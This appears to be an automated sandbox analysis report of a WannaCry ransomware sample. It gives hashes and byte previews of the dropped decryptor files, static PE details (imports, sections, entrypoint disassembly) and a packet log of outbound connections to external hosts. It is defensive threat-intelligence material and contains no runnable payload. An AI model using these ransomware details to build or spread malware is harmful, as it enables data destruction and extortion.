                                Entropy (8bit):7.998372837712669
                                Encrypted:true
                                SSDEEP:3072:ZQaF1ufXWGbWRbUdMyp/WB1Uej89+bA4IqY1+6P:VKfG1RIGy4J8cbDMx
                                MD5:24A7F07AD15AF8C25BACE944A2BE380E
                                SHA1:3EBF6EBEF7EE01EB6E15A523F6B2A1F53E01405E
                                SHA-256:57486111BCA5E3D113F7B112DECBB1DC80A2FFD37D2565DAEB8D79DE1E0851C3
                                SHA-512:6B931E2AAEEBF864A4432CFE50FF37A83FB21825FA610E1F2D42A765127E806EB80AD33C430163D1C13EC09F3D4EABAE389692D3159810E7244825938ED594AA
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....7-...YE9.n.;..s;ml.....#...!...9N......a..P..s............c.M.1.&SS.<.SE{..s...z0.v.5..j*G.J.>;....L/.El.".Vn..g;V.K....CFyJi....>....L$...:.....j.'u7..+|ZGf....x.o..6'K...^..9..`3\.y..[.Rh.g..w.>....vC//_..i..{..Y..a.@*.&d...zr.%.3.....9/................^vl.C.@..O.90..F4.~x.<IF.e..:[?"..G5...D...7Y.4..*.,W.i..g..I.PTn...rcA.n..%T|.f......;.&]........r..E..Y..C.......-p.-XX.v.E..C...].{].6....yvl..}-b."D..u^P.t.(.t.w.u:(..}.Hr......H....v...?...|[....t....(./..>.OR..hk@...nY..-Q.g...K{..%....#.qA....O.......w..~....#t.2T.#.....z."...?...{. ...j0 ...[......O.....T.a(.k..TmL..(}....+.ka.i.0./..A<.#.?. ...w<P......g..3A.fI..`.x.....?n.@...B...r.\]Fz....7>..A...o.&.h..6.!..>...P.....TX%{N.?v...zO..Hs.Q_p..rQ.."{+.U..)Q.Q.[...#cw."U...5s..C.....k..J.._....FV....v.f.r6.r.. ....Z.:/=dw....s.j8X._0@...oy.vJB."...d..5..34]...U#...D..~..R..I....j....'R....q.....k.x.|.J.F.i6.V.G......}X...o[.....l.E.6N.....s.B........AQ:.0.!.Y.....1=.y}.F..

                                C:\Users\Default\Desktop\@WanaDecryptor@.bmp

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                Category:dropped
                                Size (bytes):1440054
                                Entropy (8bit):0.3363393123555661
                                Encrypted:false
                                SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                MD5:C17170262312F3BE7027BC2CA825BF0C
                                SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                Malicious:false
                                Reputation:unknown
                                Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\Default\Desktop\@WanaDecryptor@.exe

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\Public\Desktop\@WanaDecryptor@.bmp

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                Category:dropped
                                Size (bytes):1440054
                                Entropy (8bit):0.3363393123555661
                                Encrypted:false
                                SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                MD5:C17170262312F3BE7027BC2CA825BF0C
                                SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                Malicious:false
                                Reputation:unknown
                                Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\Public\Desktop\@WanaDecryptor@.exe

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                \Device\ConDrv

                                Download File
                                Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                File Type:ASCII text, with CRLF, CR line terminators
                                Category:dropped
                                Size (bytes):48
                                Entropy (8bit):4.305255793112395
                                Encrypted:false
                                SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                MD5:6ED2062D4FB53D847335AE403B23BE62
                                SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                Malicious:false
                                Reputation:unknown
                                Preview:ERROR:...Description = Initialization failure...

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.995470941164686
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:2N2jefqo8e.exe
                                File size:3514368
                                MD5:84c82835a5d21bbcf75a61706d8ab549
                                SHA1:5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
                                SHA256:ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
                                SHA512:90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
                                SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                TLSH:73F533F4E221B7ACF2550EF64855C59B6A9724B2EBEF1E26DA8001A70D44F7F8FC0491
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:...T...T...T...X...T..._...T.'.Z...T...^...T...P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L..

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x4077ba
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:
                                Time Stamp:0x4CE78F41 [Sat Nov 20 09:05:05 2010 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:68f013d7437aa653a8a98a05807afeb1

                                Entrypoint Preview

                                Instruction
                                push ebp
                                mov ebp, esp
                                push FFFFFFFFh
                                push 0040D488h
                                push 004076F4h
                                mov eax, dword ptr fs:[00000000h]
                                push eax
                                mov dword ptr fs:[00000000h], esp
                                sub esp, 68h
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [ebp-18h], esp
                                xor ebx, ebx
                                mov dword ptr [ebp-04h], ebx
                                push 00000002h
                                call dword ptr [004081C4h]
                                pop ecx
                                or dword ptr [0040F94Ch], FFFFFFFFh
                                or dword ptr [0040F950h], FFFFFFFFh
                                call dword ptr [004081C0h]
                                mov ecx, dword ptr [0040F948h]
                                mov dword ptr [eax], ecx
                                call dword ptr [004081BCh]
                                mov ecx, dword ptr [0040F944h]
                                mov dword ptr [eax], ecx
                                mov eax, dword ptr [004081B8h]
                                mov eax, dword ptr [eax]
                                mov dword ptr [0040F954h], eax
                                call 00007F56F918C81Bh
                                cmp dword ptr [0040F870h], ebx
                                jne 00007F56F918C70Eh
                                push 0040793Ch
                                call dword ptr [004081B4h]
                                pop ecx
                                call 00007F56F918C7EDh
                                push 0040E00Ch
                                push 0040E008h
                                call 00007F56F918C7D8h
                                mov eax, dword ptr [0040F940h]
                                mov dword ptr [ebp-6Ch], eax
                                lea eax, dword ptr [ebp-6Ch]
                                push eax
                                push dword ptr [0040F93Ch]
                                lea eax, dword ptr [ebp-64h]
                                push eax
                                lea eax, dword ptr [ebp-70h]
                                push eax
                                lea eax, dword ptr [ebp-60h]
                                push eax
                                call dword ptr [004081ACh]
                                push 0040E004h
                                push 0040E000h
                                call 00007F56F918C7A5h

                                Rich Headers

                                Programming Language:
                                • [C++] VS98 (6.0) SP6 build 8804
                                • [EXP] VC++ 6.0 SP5 build 8804

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xd5a80x64.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x349fa0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x1d8.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x69b00x7000False0.5747419084821429data6.404235106100747IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x80000x5f700x6000False0.5781656901041666data6.66357096840794IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xe0000x19580x2000False0.394287109375Matlab v4 mat-file (little endian) ry, numeric, rows 0, columns 04.4557495078691405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x100000x349fa00x34a000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                XIA0x100f00x349635Zip archive data, at least v2.0 to extract, compression method=deflateEnglishUnited States
                                RT_VERSION0x3597280x388dataEnglishUnited States
                                RT_MANIFEST0x359ab00x4efexported SGML document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                Imports

                                DLLImport
                                KERNEL32.dllGetFileAttributesW, GetFileSizeEx, CreateFileA, InitializeCriticalSection, DeleteCriticalSection, ReadFile, GetFileSize, WriteFile, LeaveCriticalSection, EnterCriticalSection, SetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetFileAttributesA, SizeofResource, LockResource, LoadResource, MultiByteToWideChar, Sleep, OpenMutexA, GetFullPathNameA, CopyFileA, GetModuleFileNameA, VirtualAlloc, VirtualFree, FreeLibrary, HeapAlloc, GetProcessHeap, GetModuleHandleA, SetLastError, VirtualProtect, IsBadReadPtr, HeapFree, SystemTimeToFileTime, LocalFileTimeToFileTime, CreateDirectoryA, GetStartupInfoA, SetFilePointer, SetFileTime, GetComputerNameW, GetCurrentDirectoryA, SetCurrentDirectoryA, GlobalAlloc, LoadLibraryA, GetProcAddress, GlobalFree, CreateProcessA, CloseHandle, WaitForSingleObject, TerminateProcess, GetExitCodeProcess, FindResourceA
                                USER32.dllwsprintfA
                                ADVAPI32.dllCreateServiceA, OpenServiceA, StartServiceA, CloseServiceHandle, CryptReleaseContext, RegCreateKeyW, RegSetValueExA, RegQueryValueExA, RegCloseKey, OpenSCManagerA
                                MSVCRT.dllrealloc, fclose, fwrite, fread, fopen, sprintf, rand, srand, strcpy, memset, strlen, wcscat, wcslen, __CxxFrameHandler, ??3@YAXPAX@Z, memcmp, _except_handler3, _local_unwind2, wcsrchr, swprintf, ??2@YAPAXI@Z, memcpy, strcmp, strrchr, __p___argv, __p___argc, _stricmp, free, malloc, ??0exception@@QAE@ABV0@@Z, ??1exception@@UAE@XZ, ??0exception@@QAE@ABQBD@Z, _CxxThrowException, calloc, strcat, _mbsstr, ??1type_info@@UAE@XZ, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _controlfp

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 31, 2023 16:15:08.982954979 CET49823443192.168.11.2095.130.11.147
                                Jan 31, 2023 16:15:08.983059883 CET4434982395.130.11.147192.168.11.20
                                Jan 31, 2023 16:15:08.983191013 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:08.983275890 CET49823443192.168.11.2095.130.11.147
                                Jan 31, 2023 16:15:08.993171930 CET49823443192.168.11.2095.130.11.147
                                Jan 31, 2023 16:15:08.993243933 CET4434982395.130.11.147192.168.11.20
                                Jan 31, 2023 16:15:09.024831057 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.025152922 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.036135912 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.079245090 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.081216097 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.122889996 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.123358965 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.165112019 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.165216923 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.165528059 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.217772961 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.260479927 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.261230946 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.303674936 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.303761959 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.303828001 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.303870916 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.303932905 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.303987980 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.304043055 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.304064989 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.304141998 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.304195881 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.304220915 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.304272890 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.304371119 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.304442883 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.304474115 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.304522991 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.304644108 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.345954895 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346065044 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346131086 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346203089 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346267939 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346333981 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346345901 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.346345901 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.346446037 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346499920 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.346535921 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346600056 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346662045 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346673012 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.346745968 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346812963 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346838951 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.346901894 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.346962929 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.347008944 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.347049952 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.347112894 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.347177029 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.347186089 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.347186089 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.347268105 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.347331047 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.347352028 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.347352028 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.347352028 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.347521067 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.347690105 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.347691059 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.388557911 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.388644934 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.388711929 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.388773918 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.388830900 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.388885975 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.388921022 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.388921976 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389002085 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389056921 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389075041 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389075041 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389141083 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389194965 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389250994 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389259100 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389259100 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389329910 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389384031 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389415979 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389415979 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389472008 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389527082 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389583111 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389589071 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389653921 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389707088 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389755011 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389779091 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389832973 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389885902 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.389928102 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389928102 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389929056 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389929056 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.389988899 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390043974 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390100002 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390106916 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390106916 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390178919 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390233040 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390265942 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390265942 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390316010 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390369892 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390422106 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390506029 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390562057 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390604973 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390604973 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.390644073 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390697956 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390749931 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390810966 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390863895 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390916109 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.390983105 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.391036987 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.391089916 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.391113997 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.391283989 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.391623020 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.432256937 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432413101 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432485104 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432550907 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432605982 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432657957 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432682037 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.432748079 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432806015 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432851076 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.432851076 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.432892084 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.432948112 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433001041 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433021069 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433021069 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433085918 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433139086 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433195114 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433202982 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433202982 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433275938 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433331966 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433360100 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433360100 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433418036 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433471918 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433527946 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433535099 CET4982480192.168.11.20171.25.193.9
                                Jan 31, 2023 16:15:09.433598995 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433653116 CET8049824171.25.193.9192.168.11.20
                                Jan 31, 2023 16:15:09.433700085 CET4982480192.168.11.20171.25.193.9
